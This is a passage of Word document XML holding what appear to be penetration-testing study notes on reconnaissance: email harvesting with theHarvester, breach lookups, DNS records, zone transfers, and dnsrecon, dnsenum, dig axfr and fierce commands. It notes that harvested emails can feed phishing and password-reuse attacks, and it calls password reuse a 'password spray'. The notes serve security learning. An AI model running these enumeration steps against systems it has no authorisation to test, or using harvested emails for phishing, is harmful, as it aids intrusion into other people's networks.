          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“theHarvester -d hackersploit.org -b google,linkedin,yahoo,dnsdumpster,duckduckgo,crtsh”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D190B8C" w14:textId="77777777" w:rsidR="00C77E62" w:rsidRPr="002A77BD" w:rsidRDefault="00C77E62" w:rsidP="00165019">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="236395A8" w14:textId="59D723C8" w:rsidR="00D91326" w:rsidRPr="002A77BD" w:rsidRDefault="00D91326" w:rsidP="00D91326">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">When we find emails pertinent to a target, the attackers can use that to utilize </w:t>
      </w:r>
      <w:r w:rsidR="0009076B" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>phishing,</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> which will then lead us to initial access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D102285" w14:textId="77777777" w:rsidR="00C77E62" w:rsidRPr="002A77BD" w:rsidRDefault="00C77E62" w:rsidP="00C77E62">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00635A5E" w14:textId="4A9F7AF6" w:rsidR="00D91326" w:rsidRPr="002A77BD" w:rsidRDefault="00D91326" w:rsidP="00D91326">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Password spray attack: When you find a password for an email, you can utilize that password that you received from one site to other sites (to exploit password reuse)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019473E5" w14:textId="77777777" w:rsidR="00AA1642" w:rsidRPr="002A77BD" w:rsidRDefault="00AA1642" w:rsidP="00AA1642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B76BF0B" w14:textId="77777777" w:rsidR="00C77E62" w:rsidRPr="002A77BD" w:rsidRDefault="00C77E62" w:rsidP="00C77E62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CBDE13E" w14:textId="440AAB7D" w:rsidR="00C77E62" w:rsidRPr="002A77BD" w:rsidRDefault="00A12055" w:rsidP="00C77E62">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Leaked Password Databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07162F62" w14:textId="0DE330CC" w:rsidR="00A12055" w:rsidRPr="002A77BD" w:rsidRDefault="00420090" w:rsidP="008D32D5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00AA1642" w:rsidRPr="002A77BD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          </w:rPr>
          <w:t>https://haveibeenpwned.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4524D6C7" w14:textId="19DE5CBC" w:rsidR="00AA1642" w:rsidRPr="002A77BD" w:rsidRDefault="00AA1642" w:rsidP="008D32D5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Will determine if an email has been involved in a data breach/data leak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D63A23" w14:textId="68A3742B" w:rsidR="00AA1642" w:rsidRPr="002A77BD" w:rsidRDefault="00AA1642" w:rsidP="008D32D5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Can be utilized to determine if an organization’s password policy is too lax.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC1A950" w14:textId="77777777" w:rsidR="00AA1642" w:rsidRPr="002A77BD" w:rsidRDefault="00AA1642" w:rsidP="00AA1642">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75A03E12" w14:textId="60BC7753" w:rsidR="00AA1642" w:rsidRPr="002A77BD" w:rsidRDefault="00AA1642" w:rsidP="00AA1642">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ACTIVE RECON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A62501" w14:textId="77777777" w:rsidR="00D91326" w:rsidRPr="002A77BD" w:rsidRDefault="00D91326" w:rsidP="00165019">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="054045CB" w14:textId="7580D361" w:rsidR="00AA1642" w:rsidRPr="002A77BD" w:rsidRDefault="00AA1642" w:rsidP="00165019">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>DNS Zone Transfers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5233B552" w14:textId="77777777" w:rsidR="00AA1642" w:rsidRPr="002A77BD" w:rsidRDefault="00AA1642" w:rsidP="00165019">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72EECC6C" w14:textId="57B2B058" w:rsidR="00AA1642" w:rsidRPr="002A77BD" w:rsidRDefault="00AA1642" w:rsidP="00165019">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+ Domain Name System (DNS) is a protocol that is used to resolve domain names/hostnames to IP addresses</w:t>
      </w:r>
      <w:r w:rsidR="00EE639A" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AF7F40" w14:textId="254B1335" w:rsidR="00AA1642" w:rsidRPr="002A77BD" w:rsidRDefault="00AA1642" w:rsidP="00165019">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+ During the early days of the internet, users would have to remember IP addresses of the sites that they wanted to visit. DNS resolves this issue by mapping a regular name to an IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64976F7E" w14:textId="3744729B" w:rsidR="00AA1642" w:rsidRPr="002A77BD" w:rsidRDefault="00AA1642" w:rsidP="00165019">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+ A DNS server (nameserver) is like a telephone directory that contains domain names and their corresponding IP addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C49D245" w14:textId="13F0EA10" w:rsidR="00AA1642" w:rsidRPr="002A77BD" w:rsidRDefault="00AA1642" w:rsidP="00165019">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+ Public DNS servers have been set up by companies such as Cloudflare (1.1.1.1) and Google (8.8.8.8). These are popular DNS servers to utilize because they contain records of almost all domains on the Internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512D49D7" w14:textId="1E847AE8" w:rsidR="00EE639A" w:rsidRPr="002A77BD" w:rsidRDefault="00EE639A" w:rsidP="00165019">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>DNS Records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AA7021" w14:textId="0A727E31" w:rsidR="00EE639A" w:rsidRPr="002A77BD" w:rsidRDefault="00EE639A" w:rsidP="00165019">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+ A – Resolves a hostname or domain to an IPv4 address</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
        <w:t>+ AAAA – Resolves a hostname or domain to an IPv6 address</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
        <w:t>+ NS – Reference to the domains nameserver</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
        <w:t>+ MX – Resolves a domain to a mail server</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
        <w:t>+ CNAME – Used for domain aliases</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
        <w:t>+ TXT – Text record</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
        <w:t>+ HINFO – Host Information</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
        <w:t>+ SOA – Domain authority</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
        <w:t>+ SRV – Service records</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
        <w:t>+ PTR – Resolves an IP address to a hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD75C97" w14:textId="055AA021" w:rsidR="00EE639A" w:rsidRPr="002A77BD" w:rsidRDefault="00EE639A" w:rsidP="00165019">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>DNS Interrogation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087DCDDD" w14:textId="711A45AF" w:rsidR="00EE639A" w:rsidRPr="002A77BD" w:rsidRDefault="00EE639A" w:rsidP="00165019">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+ DNS interrogation is the process of enumerating DNS records for a specific domain</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
        <w:t>+ The objective of DNS interrogation is to probe a DNS server to provide us with DNS records for a specific domain.</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
        <w:t>+ This process can provide with important information like the IP address of a domain, subdomains, mail server addresses etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76945B81" w14:textId="50F679CC" w:rsidR="00EE639A" w:rsidRPr="002A77BD" w:rsidRDefault="00EE639A" w:rsidP="00165019">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>DNS Zone Transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4212133A" w14:textId="7165D214" w:rsidR="00EE639A" w:rsidRPr="002A77BD" w:rsidRDefault="00EE639A" w:rsidP="00165019">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+ In certain cases DNS server admins may want to copy or transfer zone files from one DNS server to another. This process is known as a zone transfer.</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
        <w:t>+ If misconfigured and left unsecured, this functionality can be abused by attackers to copy the zone file from the primary DNS server to another DNS server.</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
        <w:t>+ A DNS Zone transfer can provide penetration testers with a holistic view of an organization’s network layout.</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>+ Furthermore, in certain cases, internal network addresses may be found on an organization’s DNS servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B29E6A" w14:textId="77777777" w:rsidR="004332C1" w:rsidRPr="002A77BD" w:rsidRDefault="004332C1" w:rsidP="004332C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“dnsrecon -d “zonetransfer.me”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C72B76" w14:textId="5B1E00CA" w:rsidR="004332C1" w:rsidRPr="002A77BD" w:rsidRDefault="004332C1" w:rsidP="004332C1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>DNSEnum performs active reconnaissance</w:t>
      </w:r>
      <w:r w:rsidR="000F2126" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4C427E" w14:textId="1C614843" w:rsidR="004332C1" w:rsidRPr="002A77BD" w:rsidRDefault="004332C1" w:rsidP="004332C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Enumerate records that are publicly available</w:t>
      </w:r>
      <w:r w:rsidR="000F2126" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2F2004" w14:textId="52017138" w:rsidR="004332C1" w:rsidRPr="002A77BD" w:rsidRDefault="004332C1" w:rsidP="004332C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Perform a DNS Zone transfer automatically</w:t>
      </w:r>
      <w:r w:rsidR="000F2126" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDFE73E" w14:textId="77CDF1B3" w:rsidR="004332C1" w:rsidRPr="002A77BD" w:rsidRDefault="004332C1" w:rsidP="004332C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Perform DNS bruteforce to identify records, more specifically subdomains, by identifying records that way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B632F4A" w14:textId="77777777" w:rsidR="004332C1" w:rsidRPr="002A77BD" w:rsidRDefault="004332C1" w:rsidP="004332C1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65910850" w14:textId="46AC3916" w:rsidR="004332C1" w:rsidRPr="002A77BD" w:rsidRDefault="000F2126" w:rsidP="004332C1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+ /etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0173DC6F" w14:textId="5B7C7E2D" w:rsidR="000F2126" w:rsidRPr="002A77BD" w:rsidRDefault="000F2126" w:rsidP="000F2126">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Can map an IP address to a local domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD6B431" w14:textId="39C5272B" w:rsidR="000F2126" w:rsidRPr="002A77BD" w:rsidRDefault="000F2126" w:rsidP="000F2126">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>This is because that address is not mapped to a domain on the Internet, making it only accessible locally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2793E6BD" w14:textId="77777777" w:rsidR="00AA1642" w:rsidRPr="002A77BD" w:rsidRDefault="00AA1642" w:rsidP="00165019">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FF1F00B" w14:textId="68D3D9F6" w:rsidR="000F2126" w:rsidRPr="00F67E78" w:rsidRDefault="000F2126" w:rsidP="00F67E78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>In order for a DNS zone transfer to work, the zone transfer functionality must be enabled on a nameserver, primarily the primary DNS nameserver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8484EE" w14:textId="09165C48" w:rsidR="002707F3" w:rsidRPr="00F67E78" w:rsidRDefault="000F2126" w:rsidP="00F67E78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“dnsenum (DOMAIN)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332D1A71" w14:textId="0219EE0B" w:rsidR="002707F3" w:rsidRPr="00F67E78" w:rsidRDefault="002707F3" w:rsidP="00F67E78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“dig axfr (</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>zone transfer switch</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>) (RECORD)” – no bruteforce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14704C55" w14:textId="39FDFE77" w:rsidR="002707F3" w:rsidRPr="002A77BD" w:rsidRDefault="002707F3" w:rsidP="002707F3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“fierce -dns (DOMAIN)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D39DE1E" w14:textId="77777777" w:rsidR="001160EA" w:rsidRPr="002A77BD" w:rsidRDefault="001160EA" w:rsidP="001160EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ED92C74" w14:textId="51AAC69E" w:rsidR="001160EA" w:rsidRPr="002A77BD" w:rsidRDefault="001160EA" w:rsidP="001160EA">
      <w:pPr>
        <w:rPr>
